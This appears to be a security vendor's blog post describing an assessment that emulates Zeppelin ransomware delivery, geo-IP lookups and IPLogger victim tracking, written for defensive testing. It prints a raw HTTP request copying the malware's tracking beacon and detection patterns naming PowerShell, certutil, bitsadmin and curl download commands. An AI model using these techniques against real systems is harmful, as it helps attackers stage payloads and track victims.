On August 11, 2022, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) jointly released a Cybersecurity Advisory publishing indicators and behaviors observed in Zeppelin Ransomware attacks between 2019 and 2022. The release is a continuation of their #StopRansomware effort to inform defenders about ransomware variants and their threat actors.*
Zeppelin Ransomware is an evolution of the Vega and Buran Ransomware as a Service (RaaS) malware families. The ransomware has been adopted by many different malicious actors and has been observed broadly targeting organizations in the defense, education, manufacturing, and healthcare sectors. Initial access is typically achieved by these groups through spearphishing and the exploitation of common vulnerabilities. Once access has been established the Zeppelin Ransomware disables and deletes backups before encrypting the victim’s files. Some variants of the malware use legitimate third party sites to discover the victim’s external IP addresses and track victim installs.
AttackIQ has released a new assessment to help customers validate their security controls and their ability to defend against the delivery of this ransomware family.
Ingress Tool Transfer (T1105)
- Download / Save 2019-11 Zeppelin Ransomware Sample
- Download / Save 2020-07 Zeppelin Ransomware Sample
- Download / Save 2021-08 Zeppelin Ransomware Sample
- Download / Save 2022-05 Zeppelin Ransomware Sample
The assessment will first test the delivery of different variants of the Zeppelin Ransomware family using unique samples throughout the malware family’s evolution. Each malware file is downloaded from an AttackIQ controlled server to the host’s memory to first test network controls that inspect incoming file downloads. Finally, the endpoint controls are tested by saving the file from memory to disk to validate if EDR or Antivirus solutions can prevent the file from being written.
Web Service (T1102)
- GeoIpTool.com IP Address Lookup Web Request
- GeoDataTool.com IP Address Lookup Web Request
The next series of tests emulate the behavior observed during the initial Zeppelin infection where the malware makes web requests to a legitimate site to discover the external IP address of the victim and then register with the threat actor. GeoDataTool.com is a legitimate web service that informs visitors of their external IP address and geo location information. GeoIpTool.com was an older version of that site that now redirects to GeoDataTool.com and was hardcoded into older versions of Zeppelin. These scenarios test access to the legitimate site using both domains.
One-Way Communication (T1102.003)
- Zeppelin Ransomware IPLogger.org Tracking Web Request
The final test emulates the web connection request to another legitimate web service IPLogger.org. The site allows users to create tracking short links that act as canary tokens. When a short link is accessed the external IP address, User-Agent, and Referer field are recorded in a dashboard accessible by the link creator. Zeppelin Ransomware uses a hardcoded User-Agent of Zeppelin and places a unique tracking value in the Referer field. The actor can then access the dashboard and track their victims. This scenario emulates this behavior by attempting to request a safe IPLogger short link with the same Zeppelin User Agent and unique tracking value.
GET /<Short Link ID>.jpg HTTP/1.1 Host: iplogger.org User-Agent: ZEPPELIN Referer: <Unique Tracking Value>
Additional Emulation Considerations
Earlier this year AttackIQ, released a full-featured attack graph that emulated the tactics, techniques, and procedures (TTPs) used by the Conti Ransomware Group. While Zeppelin Ransomware was not used by that actor, many of the techniques used by Conti are used by many of the same threat actors that deploy other Ransomware-as-a-Service providers. The AttackIQ Adversary Research Team believes that given its comprehensiveness, the Conti Ransomware Team attack graph is an ideal choice for validating a customer’s security controls against a Zeppelin ransomware attack at this time.
Detection Opportunities
Once a malicious actor has compromised an endpoint, they may attempt to transfer any tools or malware onto the device. Attackers may utilize tools such as PowerShell, Certutil, Bitsadmin, and Curl.
PowerShell Example: Process Name == (Cmd.exe OR Powershell.exe) Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest”) AND “DownloadData” AND “Hidden”) Certutil Example: Process Name == Certutil.exe Command Line Contains (“-urlcache” AND “-f”) Bitsadmin Example: Process Name == Bitsadmin.exe Command Line CONTAINS (“/transfer” AND “http”) Curl Example: Process Name == Curl.exe Command Line CONTAINS (“http” AND “-o”)
Conclusion
Ransomware-as-a-Service is prolific, and this new assessment will help customers validate their security controls against the Zeppelin Ransomware threat and the many actors conducting the attacks by focusing on the malware itself and the network discovery actions it takes. AttackIQ stands at the ready to help security teams implement this attack graph and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard.
*We briefly debated an alternate title for this blog: “Get the Led Out”
